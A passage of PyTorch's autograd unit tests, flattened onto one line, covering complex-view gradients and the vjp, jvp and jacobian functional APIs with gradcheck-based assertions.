test_jit dim_args_idx=(), skipTestIf=(), output_process_fn=lambda x: x, kwargs=None): kwargs = kwargs if kwargs else {} basic_test_name = 'test_' + name if variant_name != '': basic_test_name += '_' + variant_name if name in separate_complex_tests and 'complex' in variant_name: run_only_complex = True else: run_only_complex = False for dtype in [torch.double, torch.cdouble]: for dim_perm in product([-1, 1], repeat=len(dim_args_idx)): test_name = basic_test_name new_args = [arg * dim_perm[dim_args_idx.index(i)] if i in dim_args_idx else arg for i, arg in enumerate(args)] test_name = basic_test_name + ''.join('_neg' + str(i) for i, idx in enumerate(dim_perm) if idx < 0) if dtype.is_complex: # TODO: remove this. this is temporary while we ramp up the complex support. if name in complex_list: if name in separate_complex_tests and 'complex' not in variant_name: continue if not run_only_complex: test_name = test_name + '_complex' else: continue elif run_only_complex: continue new_args = tuple(new_args) # for-loop bodies don't define scopes, so we have to save the variables # we want to close over in some way def do_test(self, device, dtype=dtype, name=name, self_size=self_size, args=new_args, test_name=test_name, output_process_fn=output_process_fn): def check(name): is_magic_method = name[:2] == '__' and name[-2:] == '__' is_inplace = name[-1] == "_" and not is_magic_method self_variable = create_input((self_size,), dtype=dtype, device=device)[0][0] # FixMe: run grad checks on inplace self if is_inplace: self_variable.requires_grad = False # need to record this because methods can change the size (e.g. unsqueeze) args_variable, kwargs_variable = create_input(args, requires_grad=not is_inplace, call_kwargs=kwargs, dtype=dtype, device=device) self_tensor = deepcopy(self_variable) args_tensor = deepcopy(unpack_variables(args_variable)) if not exclude_tensor_method(name, test_name): output_variable = getattr(self_variable, name)(*args_variable, **kwargs_variable) output_tensor = getattr(self_tensor, name)(*args_tensor, **kwargs_variable) if not isinstance(output_tensor, torch.Tensor) and not isinstance(output_tensor, tuple): if dtype.is_complex: output_tensor = torch.tensor((output_tensor, ), dtype=torch.cfloat, device=device) else: output_tensor = torch.tensor((output_tensor, ), dtype=torch.float, device=device) self.assertEqual(unpack_variables(output_variable), output_tensor) # TODO: check that both have changed after adding all inplace ops def fn(*inputs): output = getattr(inputs[0], name)(*inputs[1:], **kwargs) return output_process_fn(output) if not is_inplace and name not in EXCLUDE_GRADCHECK: check_batched_grad = test_name not in EXCLUDE_BATCHED_GRAD_TESTS run_grad_and_gradgrad_checks(self, name, test_name, fn, output_variable, (self_variable,) + args_variable, check_batched_grad=check_batched_grad) # functional interface tests torch_fn = getattr_qualified(torch, name) if torch_fn is not None and name not in EXCLUDE_FUNCTIONAL: def fn(*inputs): output = torch_fn(*inputs, **kwargs) return output_process_fn(output) f_args_variable = (self_variable,) + args_variable f_args_tensor = (self_tensor,) + args_tensor # could run the gradchecks again, but skip since we did it for the methods above. run_gradcheck = exclude_tensor_method(name, test_name) and not is_inplace and name not in EXCLUDE_GRADCHECK run_functional_checks(self, test_name, name, fn, run_gradcheck, f_args_variable, f_args_tensor) # check for correct type of input and input.grad if not is_inplace: self_variable = create_input((self_size,), requires_grad=True, dtype=dtype)[0][0] args_variable, kwargs_variable = create_input(args, requires_grad=False, call_kwargs=kwargs, dtype=dtype) if hasattr(self_variable, name): attribute_result = getattr(self_variable, name) if callable(attribute_result): output_variable = attribute_result(*args_variable, **kwargs_variable) else: self.assertTrue(len(args_variable) == 0) self.assertTrue(len(kwargs_variable) == 0) output_variable = attribute_result else: self_and_args_variable = (self_variable,) + args_variable output_variable = torch_fn(*self_and_args_variable, **kwargs_variable) if isinstance(output_variable, torch.autograd.Variable): if output_variable.is_sparse: rand = randn_like(output_variable.to_dense()).to_sparse() else: rand = randn_like(output_variable) output_variable.backward(rand) self.assertTrue(type(self_variable) == type(self_variable.grad)) self.assertTrue(self_variable.size() == self_variable.grad.size()) # compare grads to inplace grads inplace_name = name + '_' # can't broadcast inplace to left hand side skip_inplace = ('broadcast_lhs' in test_name or 'broadcast_all' in test_name) if hasattr(torch.ones(1), inplace_name) and not skip_inplace: output_variable = getattr(self_variable, name)(*args_variable, **kwargs_variable) if not isinstance(output_variable, tuple): output_variable = (output_variable,) inplace_self_variable = deepcopy(self_variable) inplace_self_variable_copy = tuple(i.clone() if isinstance(i, torch.Tensor) else i for i in (inplace_self_variable,)) inplace_args_variable = deepcopy(args_variable) inplace_args_variable_copy = tuple(i.clone() if isinstance(i, torch.Tensor) else i for i in inplace_args_variable) inplace_output_variable = ( getattr(inplace_self_variable_copy[0], inplace_name)(*inplace_args_variable_copy, **kwargs_variable)) if not isinstance(inplace_output_variable, tuple): inplace_output_variable = (inplace_output_variable,) self.assertEqual(inplace_output_variable, output_variable) # Check that gradient is the same for inp_i, i in zip((inplace_self_variable,) + inplace_args_variable, (self_variable,) + args_variable): if not isinstance(inp_i, torch.Tensor): assert not isinstance(i, torch.Tensor) continue if inp_i.grad is not None: with torch.no_grad(): inp_i.grad.zero_() if i.grad is not None: with torch.no_grad(): i.grad.zero_() for i_o, o in zip(inplace_output_variable, output_variable): if dtype.is_complex: grad = randn_like(i_o).to(torch.cdouble) else: grad = randn_like(i_o).double() i_o.backward(grad) o.backward(grad) for inp_i, i in zip((inplace_self_variable,) + inplace_args_variable, (self_variable,) + args_variable): if not isinstance(inp_i, torch.Tensor): continue self.assertEqual(inp_i.grad, i.grad) check(name) inplace_name = name + '_' # can't broadcast inplace to left hand side broadcast_skip_inplace = 'broadcast_lhs' in test_name or 'broadcast_all' in test_name if hasattr(torch.ones(1), inplace_name) and not broadcast_skip_inplace: check(inplace_name) assert not hasattr(TestAutograd, test_name), 'Two tests have the same name: ' + test_name for skip in skipTestIf: do_test = skip(do_test) setattr(TestAutogradDeviceType, test_name, do_test) class TestAutogradComplex(TestCase): def test_view_func_for_complex_views(self): # case 1: both parent and child have view_func x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True) y = x.detach().requires_grad_(True) x0 = x.clone() x1 = torch.view_as_complex(x0) x2 = torch.view_as_real(x1) x2.mul_(2) x2.sum().backward() y0 = y.clone() y0.mul_(2) y0.sum().backward() self.assertEqual(x.grad, y.grad) # case 2: parent has view_func but child does not x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True) y = x.detach().requires_grad_(True) def fn(a): b = a.clone() b1 = torch.view_as_complex(b) b2 = b1.reshape(b1.numel()) return b2 x0 = fn(x) x0.mul_(2) x0.sum().backward() y0 = fn(y) y1 = y0.mul(2) y1.sum().backward() self.assertEqual(x.grad, y.grad) # case 3: parent does not have a view_func but child does x = torch.randn(10, dtype=torch.cdouble, requires_grad=True) y = x.detach().requires_grad_(True) def fn(a, dim0_size=5): b = a.clone() b1 = b.reshape(dim0_size, 2) b2 = torch.view_as_real(b1) return b2 x0 = fn(x) x0.mul_(2) x0.sum().backward() y0 = fn(y) y1 = y0.mul(2) y1.sum().backward() self.assertEqual(x.grad, y.grad) def test_view_with_multi_output(self): x = torch.randn(2, 2, 2, dtype=torch.double) x1 = torch.view_as_complex(x) # Taking an invalid view should always be allowed as long as it is not # modified inplace res = x1.unbind(0) with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"): res[0] += torch.rand(2, requires_grad=True) x.requires_grad_(True) x1 = torch.view_as_complex(x) # Taking an invalid view should always be allowed as long as it is not # modified inplace res = x1.unbind(0) with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"): res[0] += torch.rand(2, requires_grad=True) def as_identity(self): # view_as_real and view_as_complex behavior should be like an identity def func(z): z_ = torch.view_as_complex(z) z_select = torch.select(z_, z_.dim() - 1, 0) z_select_real = torch.view_as_real(z_select) return z_select_real.sum() z = torch.randn(10, 2, 2, dtype=torch.double, requires_grad=True) gradcheck(func, [z]) func(z).backward() z1 = z.clone().detach().requires_grad_(True) torch.select(z1, z1.dim() - 2, 0).sum().backward() self.assertEqual(z.grad, z1.grad) class TestAutogradFunctional(TestCase): def _assert_same_struct(self, res, base): # base and res should be Tensors or tuple of Tensors with the same size if isinstance(base, torch.Tensor): self.assertTrue(isinstance(res, torch.Tensor)) self.assertEqual(base.size(), res.size()) elif isinstance(base, tuple): self.assertTrue(isinstance(res, tuple)) self.assertEqual(len(base), len(res)) for el_base, el_res in zip(base, res): self.assertTrue(isinstance(el_base, torch.Tensor)) self.assertTrue(isinstance(el_res, torch.Tensor)) self.assertEqual(el_base.size(), el_res.size()) else: # Wrong base raise RuntimeError("The base given to `_assert_same_struct` doesn't have" " the right structure.") def _assert_interleaved_struct(self, res, base1, base2): # base1 and base2 can be Tensors or tuples of Tensors. # If they are tuples, res should be a tuple as well. # The indexing works as follows for base1, base2 being # - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l]) # - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l]) # - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l]) # - Tensor, Tensor: res[k][l] = (base1[k], base2[l]) if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor): self.assertTrue(isinstance(res, torch.Tensor)) self.assertEqual(res.size(), base1.size() + base2.size()) elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor): self.assertTrue(isinstance(res, tuple)) self.assertEqual(len(res), len(base1)) for el_res, el_base1 in zip(res, base1): self.assertTrue(isinstance(el_res, torch.Tensor)) self.assertTrue(isinstance(el_base1, torch.Tensor)) self.assertEqual(el_res.size(), el_base1.size() + base2.size()) elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple): self.assertTrue(isinstance(res, tuple)) self.assertEqual(len(res), len(base2)) for el_res, el_base2 in zip(res, base2): self.assertTrue(isinstance(el_res, torch.Tensor)) self.assertTrue(isinstance(el_base2, torch.Tensor)) self.assertEqual(el_res.size(), base1.size() + el_base2.size()) elif isinstance(base1, tuple) and isinstance(base2, tuple): self.assertTrue(isinstance(res, tuple)) self.assertEqual(len(res), len(base1)) for el_res, el_base1 in zip(res, base1): self.assertTrue(isinstance(el_res, tuple)) self.assertEqual(len(res), len(base2)) for el_el_res, el_base2 in zip(el_res, base2): self.assertTrue(isinstance(el_el_res, torch.Tensor)) self.assertTrue(isinstance(el_base2, torch.Tensor)) self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size()) else: # Wrong bases raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have" " the right structure.") def test_vjp_err_check(self): def foo(a): return 3 * a.narrow(0, 0, 3) def bar(a): return 3 * a.narrow(0, 0, 3), "bar" inp = torch.rand(4) v = torch.ones(3) with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"): res = autogradF.vjp(foo, (inp, 2), v) with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"): res = autogradF.vjp(bar, inp, v) with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"): res = autogradF.vjp(foo, inp) with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."): res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp))) with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"): res = autogradF.vjp(foo, inp, v[:2]) res = autogradF.vjp(foo, inp, v)[1] self._assert_same_struct(res, inp) def test_vjp_err_check_strict(self): def foo(a): return a.detach() def bar(a): # Make a non-leaf Tensor that requires_grad but that is not connected to the input return a.long().float().requires_grad_().clone() inp = torch.rand(4) v = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."): res = autogradF.vjp(foo, inp, v, strict=True) res = autogradF.vjp(foo, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"): res = autogradF.vjp(bar, inp, v, strict=True) res = autogradF.vjp(bar, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) # The Jacobian does not depend on the input def foo(a): return a.clone() inp.requires_grad_() with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."): res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True) res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1], v) def test_vjp_no_grad(self): def reducer(x): return x.sum(dim=1) inputs = torch.rand(4, 4) v = torch.ones(4) with torch.no_grad(): res = autogradF.vjp(reducer, inputs, v) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) inputs.requires_grad_() v.requires_grad_() with torch.no_grad(): res = autogradF.vjp(reducer, inputs, v, create_graph=True) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) def test_vjp_output(self): def reducer(x): return x.sum(dim=1) inputs = torch.rand(4, 4) v = torch.ones(4) res = autogradF.vjp(reducer, inputs, v) self._assert_same_struct(res[1], inputs) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) def adder(x, y): return 2 * x + 3 * y inputs = (torch.rand(2), torch.rand(2)) v = torch.ones(2) out, vjp_val = autogradF.vjp(adder, inputs, v) self._assert_same_struct(vjp_val, inputs) self.assertIsNone(out.grad_fn) self.assertIsNone(vjp_val[0].grad_fn) self.assertIsNone(vjp_val[1].grad_fn) def adder(x, y): return 2 * x + 3 * y, x + y inputs = (torch.rand(2), torch.rand(2)) v = (torch.tensor([1., 0.]), torch.tensor([1., 0.])) out, vjp_val = autogradF.vjp(adder, inputs, v) self._assert_same_struct(vjp_val, inputs) self.assertIsNone(out[0].grad_fn) self.assertIsNone(out[1].grad_fn) self.assertIsNone(vjp_val[0].grad_fn) self.assertIsNone(vjp_val[1].grad_fn) def test_vjp_scalar(self): def reducer(x): return x.sum() inputs = torch.rand(4, 4) v = torch.ones([]) res = autogradF.vjp(reducer, inputs, v) self._assert_same_struct(res[0], v) self._assert_same_struct(res[1], inputs) res = autogradF.vjp(reducer, inputs) self._assert_same_struct(res[0], v) self._assert_same_struct(res[1], inputs) def expander(x): return x.unsqueeze(0).repeat(4) inputs = torch.rand([]) v = torch.ones(4) res = autogradF.vjp(expander, inputs, v) self._assert_same_struct(res[0], v) self._assert_same_struct(res[1], inputs) def test_vjp_create_graph(self): def reducer(x): return x.sum(dim=1) inputs = torch.rand(2, 2, dtype=torch.double) v = torch.ones(2, dtype=torch.double) inputs.requires_grad_() v.requires_grad_() res = autogradF.vjp(reducer, inputs, v, create_graph=True) self._assert_same_struct(res[1], inputs) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v)) gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v)) def adder(x, y): return 2 * x + 3 * y, x * y inputs = (torch.rand(2, dtype=torch.double, requires_grad=True), torch.rand(2, dtype=torch.double, requires_grad=True)) v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True), torch.tensor([1., 0.], dtype=torch.double, requires_grad=True)) gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v) gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v) def foo(*args): x, y = args[:2] v = args[2:] x = x.cos() val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True) return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp() gradcheck(foo, inputs + v) gradgradcheck(foo, inputs + v) def test_jvp_err_check(self): def foo(a): return 3 * a.narrow(0, 0, 3) def bar(a): return 3 * a.narrow(0, 0, 3), "bar" inp = torch.rand(4) v = torch.rand(4) with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"): res = autogradF.jvp(foo, (inp, 2), v) with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"): res = autogradF.jvp(bar, inp, v) with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"): res = autogradF.jvp(foo, inp) with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."): res = autogradF.jvp(foo, inp, (v, v)) with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"): res = autogradF.jvp(foo, inp, v[:2]) res = autogradF.jvp(foo, inp, v)[1] self._assert_same_struct(res, foo(inp)) def test_jvp_err_check_strict(self): def foo(a): return a.detach() def bar(a): # Make a non-leaf Tensor that requires_grad but that is not connected to the input return a.long().float().requires_grad_().clone() inp = torch.rand(4) v = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."): res = autogradF.jvp(foo, inp, v, strict=True) res = autogradF.jvp(foo, inp, v, strict=False) self._assert_same_struct(res[1], res[0]) self.assertEqual(res[1].abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"): res = autogradF.jvp(bar, inp, v, strict=True) res = autogradF.jvp(bar, inp, v, strict=False) self._assert_same_struct(res[1], res[0]) self.assertEqual(res[1].abs().sum(), 0.) # The Jacobian does not depend on the input def foo(a): return a.clone() inp.requires_grad_() with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."): res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True) res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1], v) def test_jvp_no_grad(self): def reducer(x): return x.sum(dim=1) inputs = torch.rand(4, 4) v = torch.ones(4, 4) with torch.no_grad(): res = autogradF.jvp(reducer, inputs, v) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) inputs.requires_grad_() v.requires_grad_() with torch.no_grad(): res = autogradF.jvp(reducer, inputs, v, create_graph=True) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) def test_jvp_output(self): def reducer(x): return x.sum(dim=1) inputs = torch.rand(4, 4) v = torch.ones(4, 4) res = autogradF.jvp(reducer, inputs, v) self._assert_same_struct(res[1], res[0]) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) def adder(x, y): return 2 * x + 3 * y inputs = (torch.rand(2), torch.rand(2)) v = (torch.ones(2), torch.ones(2)) out, jvp_val = autogradF.jvp(adder, inputs, v) self._assert_same_struct(jvp_val, out) self.assertIsNone(out.grad_fn) self.assertIsNone(jvp_val[0].grad_fn) self.assertIsNone(jvp_val[1].grad_fn) def adder(x, y): return 2 * x + 3 * y, x + y inputs = (torch.rand(2), torch.rand(2)) v = (torch.tensor([1., 0.]), torch.tensor([1., 0.])) out, jvp_val = autogradF.jvp(adder, inputs, v) self._assert_same_struct(jvp_val, out) self.assertIsNone(out[0].grad_fn) self.assertIsNone(out[1].grad_fn) self.assertIsNone(jvp_val[0].grad_fn) self.assertIsNone(jvp_val[1].grad_fn) def test_jvp_scalar(self): def reducer(x): return x.sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) res = autogradF.jvp(reducer, inputs, v) self._assert_same_struct(res[0], torch.zeros([])) self._assert_same_struct(res[1], res[0]) def expander(x): return x.unsqueeze(0).repeat(4) inputs = torch.rand([]) v = torch.ones([]) res = autogradF.jvp(expander, inputs, v) self._assert_same_struct(res[0], torch.zeros(4)) self._assert_same_struct(res[1], res[0]) res = autogradF.jvp(expander, inputs) self._assert_same_struct(res[0], torch.zeros(4)) self._assert_same_struct(res[1], res[0]) def test_jvp_create_graph(self): def reducer(x): return x.sum(dim=1) inputs = torch.rand(2, 2, dtype=torch.double) v = torch.ones(2, 2, dtype=torch.double) inputs.requires_grad_() v.requires_grad_() res = autogradF.jvp(reducer, inputs, v, create_graph=True) self._assert_same_struct(res[1], res[0]) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v)) gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v)) def adder(x, y): return 2 * x + 3 * y, x * y inputs = (torch.rand(2, dtype=torch.double, requires_grad=True), torch.rand(2, dtype=torch.double, requires_grad=True)) v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True), torch.tensor([1., 0.], dtype=torch.double, requires_grad=True)) gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v) gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v) def foo(*args): x, y = args[:2] v = args[2:] x = x.cos() val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True) return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp() gradcheck(foo, inputs + v) gradgradcheck(foo, inputs + v) def _test_construct_standard_basis_for(self, inputs): numels = tuple(tensor.numel() for tensor in inputs) results = autogradF._construct_standard_basis_for(inputs, numels) for result, inp in zip(results, inputs): self.assertEqual(result.dtype, inp.dtype) self.assertEqual(result.device, inp.device) results = torch.cat([result.to(device='cpu', dtype=torch.float) for result in results], dim=1) expected = torch.eye(results[0].shape[0], dtype=torch.float) self.assertEqual(results, expected) def test_construct_standard_basis_for(self): test_cases = [ (torch.randn(2, 3),), (torch.randn(1),), (torch.randn([]),), (torch.randn(1), torch.randn([]), torch.randn([])), (torch.randn(2), torch.randn(3), torch.randn([])), (torch.randn(2), torch.randn([]), torch.randn(3)), (torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)), (torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)), ] for inputs in test_cases: self._test_construct_standard_basis_for(inputs) @unittest.skipIf(not TEST_CUDA, "test requires CUDA") def test_construct_standard_basis_for_cuda(self): test_cases = [ (torch.randn(2), torch.randn(3, device='cuda')), (torch.randn(3, device='cuda'), torch.randn(2)), ] for inputs in test_cases: self._test_construct_standard_basis_for(inputs) def _test_vectorize_raises_no_warnings(self, api): # vmap is an experimental prototype. When someone calls torch.vmap, # it raises a python warning. This test checks that # autogradF.{jacobian, hessian} don't raise that experimental prototype # warning; it is not nice for a public-facing API to raise a warning # no matter how it is called. def foo(a): return (a ** 2).sum() x = torch.randn(3) with warnings.catch_warnings(record=True) as wa: result = api(foo, x, vectorize=True) self.assertEqual(len(wa), 0) def test_jacobian_vectorize_raises_no_warnings(self): return self._test_vectorize_raises_no_warnings(autogradF.jacobian) def test_hessian_vectorize_raises_no_warnings(self): return self._test_vectorize_raises_no_warnings(autogradF.hessian) def _test_jacobian_err_check(self, vectorize): def foo(a): return 3 * a.narrow(0, 0, 3) def bar(a): return 3 * a.narrow(0, 0, 3), "bar" inp = torch.rand(4) with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"): res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize) with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"): res = autogradF.jacobian(bar, inp, vectorize=vectorize) res = autogradF.jacobian(foo, inp, vectorize=vectorize) self._assert_interleaved_struct(res, foo(inp), inp) def foo(a, b): return b, 3 * a.narrow(0, 0, 3) inp = (torch.rand(4), torch.rand(5)) res = autogradF.jacobian(foo, inp, vectorize=vectorize) self._assert_interleaved_struct(res, foo(*inp), inp) def test_jacobian_err_check(self): return self._test_jacobian_err_check(vectorize=False) def test_jacobian_err_check_vectorize(self): return self._test_jacobian_err_check(vectorize=True) def test_jacobian_err_check_strict(self): def foo(a): return a.detach() def bar(a): # Make a non-leaf Tensor that requires_grad but that is not connected to the input return a.long().float().requires_grad_().clone() inp = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."): res = autogradF.jacobian(foo, inp, strict=True) res = autogradF.jacobian(foo, inp, strict=False) self._assert_interleaved_struct(res, foo(inp), inp) self.assertEqual(res.abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."): res = autogradF.jacobian(bar, inp, strict=True) res = autogradF.jacobian(bar, inp, strict=False) self._assert_interleaved_struct(res, foo(inp), inp) self.assertEqual(res.abs().sum(), 0.) # The Jacobian does not depend on the input def foo(a): return a.clone() inp.requires_grad_() with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."): res = autogradF.jacobian(foo, inp, create_graph=True, strict=True) res = autogradF.jacobian(foo, inp, create_graph=True, strict=False) self._assert_interleaved_struct(res, inp, inp) self.assertEqual(res, torch.eye(4)) def test_jacobian_err_check_strict_vectorize(self): def foo(x): return x inp = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "not supported together"): res = autogradF.jacobian(foo, inp, strict=True, vectorize=True) def test_jacobian_no_grad(self): def exp_reducer(x): return x.exp().sum(dim=1) inputs = torch.rand(4, 4) with torch.no_grad(): res = autogradF.jacobian(exp_reducer, inputs) self.assertIsNone(res.grad_fn) self.assertNotEqual(res, torch.zeros(4, 4)) with torch.no_grad(): res = autogradF.jacobian(exp_reducer, inputs, create_graph=True) self.assertIsNotNone(res.grad_fn) self.assertNotEqual(res, torch.zeros(4, 4)) def _test_jacobian_output(self, vectorize): def exp_reducer(x): return x.exp().sum(dim=1) inputs = torch.rand(4, 4) res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, exp_reducer(inputs), inputs) self.assertIsNone(res.grad_fn) def identity(x): return x.clone() inputs = torch.rand(4) res = autogradF.jacobian(identity, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, identity(inputs), inputs) self.assertIsNone(res.grad_fn) self.assertEqual(res, torch.eye(4)) def add_exp_reducer(x, y): return (x + y.exp()).sum(dim=1) inputs = (torch.rand(4, 4), torch.rand(4, 4)) res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) def test_jacobian_output(self): self._test_jacobian_output(vectorize=False) def test_jacobian_output_vectorize(self): self._test_jacobian_output(vectorize=True) def _test_jacobian_scalar(self, vectorize): def reducer(x): return x.sum() inputs = torch.rand(4, 4) res = autogradF.jacobian(reducer, inputs, vectorize=vectorize) self._assert_same_struct(res, inputs) def expander(x): return x.unsqueeze(0).repeat(4) inputs = torch.rand([]) res = autogradF.jacobian(expander, inputs, vectorize=vectorize) self._assert_same_struct(res, torch.zeros(4)) def test_jacobian_scalar(self): self._test_jacobian_scalar(vectorize=False) def test_jacobian_scalar_vectorize(self): self._test_jacobian_scalar(vectorize=True) def _test_jacobian_create_graph(self, vectorize): def exp_reducer(x): return x.exp().sum(dim=1) inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True) res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize) self._assert_interleaved_struct(res, exp_reducer(inputs), inputs) self.assertIsNotNone(res.grad_fn) gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs) gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs) def add_exp_reducer(x, y): return (x + y).exp().sum(dim=1) inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True), torch.rand(4, 4, dtype=torch.double, requires_grad=True)) res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize) self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs) gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs) def foo(x, y): x = x.cos() val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize) res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum() res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum() return res gradcheck(foo, inputs) gradgradcheck(foo, inputs) def test_jacobian_create_graph(self): self._test_jacobian_create_graph(vectorize=False) def test_jacobian_create_graph_vectorize(self): self._test_jacobian_create_graph(vectorize=True) def _check_jacobian_vectorize_correctness(self, f, inputs): expected = autogradF.jacobian(f, inputs, vectorize=False) result = autogradF.jacobian(f, inputs, vectorize=True) self.assertEqual(result, expected) def test_jacobian_vectorize_correctness_simple(self): def f(x): return 3 * x ** 2 x = torch.randn(2, 3, 5) self._check_jacobian_vectorize_correctness(f, x) def test_jacobian_vectorize_correctness_multi_input(self): def f(x, y): return (x.cos() * x) @ y.sin() x = torch.randn(2, 3) y = torch.randn(3, 5) self._check_jacobian_vectorize_correctness(f, (x, y)) def test_jacobian_vectorize_correctness_multi_input_multi_output(self): def f(x, y): return (x * x) @ y, x @ (x.sum(1) * y), y.sum() x = torch.randn(5, 3) y = torch.randn(3, 5) self._check_jacobian_vectorize_correctness(f, (x, y)) def test_jacobian_vectorize_correctness_unrelated_outputs(self): def f(x, y): return x, y, x, y x = torch.randn(2) y = torch.randn(3) self._check_jacobian_vectorize_correctness(f, (x, y)) def test_jacobian_vectorize_correctness_zero_dim(self): # zero-dim output def f(x, y): return x.sum(), y.sum(), x * y x = torch.randn(3) y = torch.randn(3) self._check_jacobian_vectorize_correctness(f, (x, y)) # zero-dim input def g(x): return torch.stack([x, x, x]) x = torch.randn([]) self._check_jacobian_vectorize_correctness(g, x) # Mixed zero-dim input / zero-dim output def h(x, y): return y.sum(), x * y x = torch.randn([]) y = torch.randn(1) self._check_jacobian_vectorize_correctness(h, (x, y)) @unittest.skipIf(not TEST_CUDA, "test requires CUDA") def test_jacobian_vectorize_correctness_different_devices(self): def f(x, y): return x * y, (x * y).cuda() x = 